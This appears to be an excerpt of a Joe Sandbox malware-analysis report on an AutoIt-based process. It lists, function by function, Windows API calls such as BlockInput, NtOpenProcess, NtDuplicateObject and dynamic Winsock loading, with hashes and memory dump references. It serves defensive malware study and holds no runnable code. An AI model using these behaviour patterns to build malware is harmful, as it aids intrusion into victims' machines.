Function 00CA42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA42FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00CA433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA4345

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 3f5d146059fb14e439a2cc5df4b76ef5d956b6abe9eb5b5e00b39bd8bb5a421c
Instruction ID: 3188defa6822e33b9b4e4e752f03ac211dec3036f218456a4ced2089b9f8873f
Opcode Fuzzy Hash: 3f5d146059fb14e439a2cc5df4b76ef5d956b6abe9eb5b5e00b39bd8bb5a421c
Instruction Fuzzy Hash: FB1186B1901225BFEB109BEC9C48FBFB7BCE749714F100156F914E71A0C2B45E0087A1

Function 00CA494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C8FC86), ref: 00CA495A
FindFirstFileW.KERNEL32(?,?), ref: 00CA496B
FindClose.KERNEL32(00000000), ref: 00CA497B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: bcf58647ceaae1fa034a8e738ca1e0102d71e61810c8b558b0b910e243962e1f
Instruction ID: eafb34a5ed33d7fd1c32e61537b97e1cddb032e63f5b97e7f0a87518323a860f
Opcode Fuzzy Hash: bcf58647ceaae1fa034a8e738ca1e0102d71e61810c8b558b0b910e243962e1f
Instruction Fuzzy Hash: 5FE0D8324115069752146B3CEC0D6EF7B9C9E47339F200706F435C10D0E7B099544695

Function 04744420 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQueryObject.NTDLL(00000000,00000002,00000000,000003E8,?), ref: 0474443D
NtQueryObject.NTDLL(00000000,00000002,00000000,?,00000000), ref: 04744457

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ObjectQuery
String ID:
API String ID: 2748340528-0
Opcode ID: 5254b56f05d533f48c8665119b81399497df23a973e7046bd2545e69bb58942d
Instruction ID: 7cf6013a5c68648b53cf0f1c133834b101100e8adabceeb0bfc0bba621900a2a
Opcode Fuzzy Hash: 5254b56f05d533f48c8665119b81399497df23a973e7046bd2545e69bb58942d
Instruction Fuzzy Hash: 9AF08C723086007FF311AA299C81FAF66DCDFC2A69F00053DF684DB290EA30AC0097A5

Function 0179F349 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0179F3AD), ref: 0179F36F
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0179F3AD), ref: 0179F388

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 13acdf486389bef1442edfd34e01ddca09aaf86fc7076110c6a9f7cb99e7d407
Instruction ID: 01e230ee9a9b06c97e5080a0fa8f055e0616ea298507d9e00fe53c7afa601abf
Opcode Fuzzy Hash: 13acdf486389bef1442edfd34e01ddca09aaf86fc7076110c6a9f7cb99e7d407
Instruction Fuzzy Hash: 4FF0F071E08208BFEF01EEF2E865C9DF3AAEBC4710F10C864E510D3684EA7865088650

Function 046FCC88 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,046FCCEC), ref: 046FCCAE
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,046FCCEC), ref: 046FCCC7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8c5ba39b7b4b80d7616bbc3deaa1b3fbe1ee58aabba3543aefd7bd92c5cc8db2
Instruction ID: 7fd419a62b1a9c83de981734094b315c2df77b2065943d27cd20226e31a2ec9a
Opcode Fuzzy Hash: 8c5ba39b7b4b80d7616bbc3deaa1b3fbe1ee58aabba3543aefd7bd92c5cc8db2
Instruction Fuzzy Hash: 1AF09071E043087FEB00EBE1DC5189EB3AEEBC5718F40C868A750A7A80FA7475018A64

Function 00CAA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00CB9B52,?,00CD098C,?), ref: 00CAA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00CB9B52,?,00CD098C,?), ref: 00CAA6EC

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a5677873bf25e73de3408b76d3df2a4be3bbaa8d69e155798b8d0c4cf2088497
Instruction ID: 5a893e44d7137227e15d8494c3b01f6d3c1fa5bdb056a177d95ef34835e44788
Opcode Fuzzy Hash: a5677873bf25e73de3408b76d3df2a4be3bbaa8d69e155798b8d0c4cf2088497
Instruction Fuzzy Hash: 18F0A73550522EBBDB21AFA8CC48FEA776CFF09361F048156B918D6191D7309A40DFE1

Function 047443EC Relevance: 3.0, APIs: 2, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(00000000,?,000000FF,?,00000000,00000000,00000001), ref: 04744402
NtClose.NTDLL(00000000), ref: 04744414

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseDuplicateObject
String ID:
API String ID: 2007153175-0
Opcode ID: 499bd1f262d624634163559af9a4955ab4277e80dd8ff4a4dab6f04b0e4f05ab
Instruction ID: 040ad61d3291b91d695c0897098f193b4795f4436702326f8de16b3f80ae3782
Opcode Fuzzy Hash: 499bd1f262d624634163559af9a4955ab4277e80dd8ff4a4dab6f04b0e4f05ab
Instruction Fuzzy Hash: 90D05B7125532039F620A2D95C89FFB678CCF85779F204611B564D73D5C69068008171

Function 00C6A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C68F87,?,?,?,00000001), ref: 00C6A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C6A393

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 71e307e93f9e9508fb49328417edb9ae560827977f84d41bcd2dd0dc5055d4e8
Instruction ID: 82ba169f299d37e3b5d1a3384ec08451cdd34cc52a2985588cf106c240569a78
Opcode Fuzzy Hash: 71e307e93f9e9508fb49328417edb9ae560827977f84d41bcd2dd0dc5055d4e8
Instruction Fuzzy Hash: 29B09231065608ABCA402B99FC09B8C3F68EB44A62F104012F60D44070CB6254508A91

Function 0179C31D Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0179C383), ref: 0179C343

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9387a8f0ff8db7ce6a8bd60e79a78347d2127f00d328de04c0c93786fe8b183f
Instruction ID: 18665fd47bb7c95c19acf8b1df6f25c53b77ae53e4cdc88bc67b9483ee8f95a2
Opcode Fuzzy Hash: 9387a8f0ff8db7ce6a8bd60e79a78347d2127f00d328de04c0c93786fe8b183f
Instruction Fuzzy Hash: 7FF0C270A0420AAFEF05DEA1EC55AAEF37AFBC4710F008975951057184EBB42708C691

Function 046F6470 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,046F64D6), ref: 046F6496

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: eadea6c113e0f92f52b45dd3d18e1d641b5fc4c6e65aeb83ef122df63f5e064d
Instruction ID: fa5e92fe0d6805d10417381c2ec05acf5c9397fbfce42956a54dcb1665e89ca2
Opcode Fuzzy Hash: eadea6c113e0f92f52b45dd3d18e1d641b5fc4c6e65aeb83ef122df63f5e064d
Instruction Fuzzy Hash: 6BF0A431A04309AFE714EE91CC419DEB376F784714F408579965096680FB743A458684

Function 04744478 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000040,00000040,?,?), ref: 047444AE

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: OpenProcess
String ID:
API String ID: 3743895883-0
Opcode ID: 00ad92aaf9fa49b4035a91161300e7bb27135b23f29f5e02676106f688d4a1ca
Instruction ID: 07649dd6bc0fb0e68567d29c0905e443c0b6cc419bc662aed00416923f74eac0
Opcode Fuzzy Hash: 00ad92aaf9fa49b4035a91161300e7bb27135b23f29f5e02676106f688d4a1ca
Instruction Fuzzy Hash: 31F012726053146BD704DEA88CC1BEBB3DD9F89614F04893AB685C7350E630E90497A2

Function 0179E1A5 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0179E1C3

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0958d00eff2e2a4e87f7d0e771be236d2d1a138769560cc5661cf8df98c5b42f
Instruction ID: d9d482e77ba3cd6fb88037a18016e5e1a9f0c195dc95006d0f43cff4c8a17e3f
Opcode Fuzzy Hash: 0958d00eff2e2a4e87f7d0e771be236d2d1a138769560cc5661cf8df98c5b42f
Instruction Fuzzy Hash: BCE0D871B0421817DB15A5687C88DFAF35C9768350F0002BABD09C7348EDA09D8847E4

Function 046FB620 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 046FB63E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4e2a5b3b95e8ec07eeee0b03661a417271766ec7f5ff2d72e04ac86ddd7b86b4
Instruction ID: 30a944174df7c42281bb6ce655ce12094da4ad269e2831b8ff6fbc705fd70b46
Opcode Fuzzy Hash: 4e2a5b3b95e8ec07eeee0b03661a417271766ec7f5ff2d72e04ac86ddd7b86b4
Instruction Fuzzy Hash: 77E0D832B0431457E310A559DC81EF7735CEB68614F00426EBB88D7384FDA1BD8082E8

Function 00CB45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00CB45F0

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c6a169fed1368ced63947fc16e6a78d1aaf7e33cafbc0528f82fc64c3a2f630c
Instruction ID: 8ab4eb5558b078cd23e2680697b2a726f737249cac4ddade4fb472cc67b52dd7
Opcode Fuzzy Hash: c6a169fed1368ced63947fc16e6a78d1aaf7e33cafbc0528f82fc64c3a2f630c
Instruction Fuzzy Hash: 84E0DF35204205AFC710AF5AE800F8AF7E8AF94760F008016FC09C7312DA70ED418BA0

Function 0179E1F1 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0179F65F,00000000,0179F878,?,?,00000000,00000000), ref: 0179E204

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4e58b67718fc07bf895c19e2cec08da597c4d130ba40f02f507b925dc3ff3e4d
Instruction ID: 6a3ebb9e23e091e4aa03813319a47586d305a1742451010130b7ab14ca335199
Opcode Fuzzy Hash: 4e58b67718fc07bf895c19e2cec08da597c4d130ba40f02f507b925dc3ff3e4d
Instruction Fuzzy Hash: 29D05E6630D2502EAB10D19A3D84DBB8A9CCACA7A4F0444B9B988C7200D6008C0AA3B1

Function 046FB66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,046FCF9E,00000000,046FD1B7,?,?,00000000,00000000), ref: 046FB67F

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 956bfc8eb0baa39c79a29a52a85197610d2eaa6e73bc067edae8a287f00fd510
Instruction ID: fd4ea77f649d7ffad85196258617ce10d652651f7410b1bab17a26956a4b2896
Opcode Fuzzy Hash: 956bfc8eb0baa39c79a29a52a85197610d2eaa6e73bc067edae8a287f00fd510
Instruction Fuzzy Hash: DFD05E6630D2503AF210555AAD84DBB4B9CCFC6AA5F01443DB6C8C6200E200EC0693B1

Function 0470CCB4 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(000000FF,?,00000000), ref: 0470CCC4

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: c705f36991318b5be42589a6432864c963584f63cd267ef868332ca935d3bbb2
Instruction ID: ba70b227c8c61c095be017c75b73bf0ba3973a530805dcc74e7de08db8e96a98
Opcode Fuzzy Hash: c705f36991318b5be42589a6432864c963584f63cd267ef868332ca935d3bbb2
Instruction Fuzzy Hash: 6FC092A6302524AF6206A6BC6DCCDFB52CCCE8E0AA3088273F609E3241D7584C0412B0

Function 00C80722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C80734

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 4eb6a6aa01e93f7d69b3e3eb412ba978935509e07c58d9c1c01d0c9c8f835f87
Instruction ID: 0eb129a4ba9d6ac2db5e0ef771640382692b98ff846d5b1e866965899caad8f9
Opcode Fuzzy Hash: 4eb6a6aa01e93f7d69b3e3eb412ba978935509e07c58d9c1c01d0c9c8f835f87
Instruction Fuzzy Hash: 9DC04CF1801109EBCB05EBA0D988FEE7BBCAB04305F200056A105B2100D774AB448B71

Function 00C6A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C6A35A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c7da0186470da8a913210749845bb910e85c3689f31dcb5edf34f7404522c672
Instruction ID: 491a3f847af4c786369bd0616d7ff4d2cce0c0060cb7349fe041f688130a1a83
Opcode Fuzzy Hash: c7da0186470da8a913210749845bb910e85c3689f31dcb5edf34f7404522c672
Instruction Fuzzy Hash: 76A0113002020CABCA002B8AFC08A88BFACEA002A0B008022F80C000328B32A8208A80

Function 017A8936 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_17a6000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: b1b3d57599de5eb3bb6dbcebae36b8b9ee7384693721e729f1767ea381302f4e
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: A7F08C322142019FFB61CE1ED8C0F55F7A8EBC0672FAA06B9D28097161D720EC44CA53

Function 047180A4 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 0470D804 Relevance: 145.5, APIs: 43, Strings: 40, Instructions: 284libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,0470DC12,?,00000000,0470DC2F), ref: 0470D87C
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 0470D894
GetProcAddress.KERNEL32(00000000,__WSAFDIsSet), ref: 0470D8A6
GetProcAddress.KERNEL32(00000000,closesocket), ref: 0470D8B8
GetProcAddress.KERNEL32(00000000,ioctlsocket), ref: 0470D8CA
GetProcAddress.KERNEL32(00000000,WSAGetLastError), ref: 0470D8DC
GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0470D8EE
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 0470D900
GetProcAddress.KERNEL32(00000000,accept), ref: 0470D912
GetProcAddress.KERNEL32(00000000,bind), ref: 0470D924
GetProcAddress.KERNEL32(00000000,connect), ref: 0470D936
GetProcAddress.KERNEL32(00000000,getpeername), ref: 0470D948
GetProcAddress.KERNEL32(00000000,getsockname), ref: 0470D95A
GetProcAddress.KERNEL32(00000000,getsockopt), ref: 0470D96C
GetProcAddress.KERNEL32(00000000,htonl), ref: 0470D97E
GetProcAddress.KERNEL32(00000000,htons), ref: 0470D990
GetProcAddress.KERNEL32(00000000,inet_addr), ref: 0470D9A2
GetProcAddress.KERNEL32(00000000,inet_ntoa), ref: 0470D9B4
GetProcAddress.KERNEL32(00000000,listen), ref: 0470D9C6
GetProcAddress.KERNEL32(00000000,ntohl), ref: 0470D9D8
GetProcAddress.KERNEL32(00000000,ntohs), ref: 0470D9EA
GetProcAddress.KERNEL32(00000000,recv), ref: 0470D9FC
GetProcAddress.KERNEL32(00000000,recvfrom), ref: 0470DA0E
GetProcAddress.KERNEL32(00000000,select), ref: 0470DA20
GetProcAddress.KERNEL32(00000000,send), ref: 0470DA32
GetProcAddress.KERNEL32(00000000,sendto), ref: 0470DA44
GetProcAddress.KERNEL32(00000000,setsockopt), ref: 0470DA56
GetProcAddress.KERNEL32(00000000,shutdown), ref: 0470DA68
GetProcAddress.KERNEL32(00000000,socket), ref: 0470DA7A
GetProcAddress.KERNEL32(00000000,gethostbyaddr), ref: 0470DA8C
GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 0470DA9E
GetProcAddress.KERNEL32(00000000,getprotobyname), ref: 0470DAB0
GetProcAddress.KERNEL32(00000000,getprotobynumber), ref: 0470DAC2
GetProcAddress.KERNEL32(00000000,getservbyname), ref: 0470DAD4
GetProcAddress.KERNEL32(00000000,getservbyport), ref: 0470DAE6
GetProcAddress.KERNEL32(00000000,gethostname), ref: 0470DAF8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0470DB0A
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 0470DB1C
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 0470DB2E
LoadLibraryA.KERNEL32(wship6.dll,00000000,getnameinfo,00000000,freeaddrinfo,00000000,getaddrinfo,00000000,gethostname,00000000,getservbyport,00000000,getservbyname,00000000,getprotobynumber,00000000), ref: 0470DB6C
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0470DB8A
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 0470DB9F
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 0470DBB4

Strings

WSAGetLastError, xrefs: 0470D8D4
__WSAFDIsSet, xrefs: 0470D89E
gethostbyaddr, xrefs: 0470DA84
closesocket, xrefs: 0470D8B0
WSAStartup, xrefs: 0470D8E6
listen, xrefs: 0470D9BE
accept, xrefs: 0470D90A
htonl, xrefs: 0470D976
shutdown, xrefs: 0470DA60
WSACleanup, xrefs: 0470D8F8
sendto, xrefs: 0470DA3C
getprotobyname, xrefs: 0470DAA8
inet_addr, xrefs: 0470D99A
select, xrefs: 0470DA18
getsockname, xrefs: 0470D952
ws2_32.dll, xrefs: 0470D836
gethostname, xrefs: 0470DAF0
recv, xrefs: 0470D9F4
gethostbyname, xrefs: 0470DA96
bind, xrefs: 0470D91C
inet_ntoa, xrefs: 0470D9AC
freeaddrinfo, xrefs: 0470DB14, 0470DB94
getaddrinfo, xrefs: 0470DB02, 0470DB7F
htons, xrefs: 0470D988
wship6.dll, xrefs: 0470DB67
recvfrom, xrefs: 0470DA06
ioctlsocket, xrefs: 0470D8C2
send, xrefs: 0470DA2A
setsockopt, xrefs: 0470DA4E
socket, xrefs: 0470DA72
getservbyport, xrefs: 0470DADE
ntohl, xrefs: 0470D9D0
ntohs, xrefs: 0470D9E2
getprotobynumber, xrefs: 0470DABA
getservbyname, xrefs: 0470DACC
connect, xrefs: 0470D92E
getsockopt, xrefs: 0470D964
WSAIoctl, xrefs: 0470D88C
getnameinfo, xrefs: 0470DB26, 0470DBA9
getpeername, xrefs: 0470D940

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
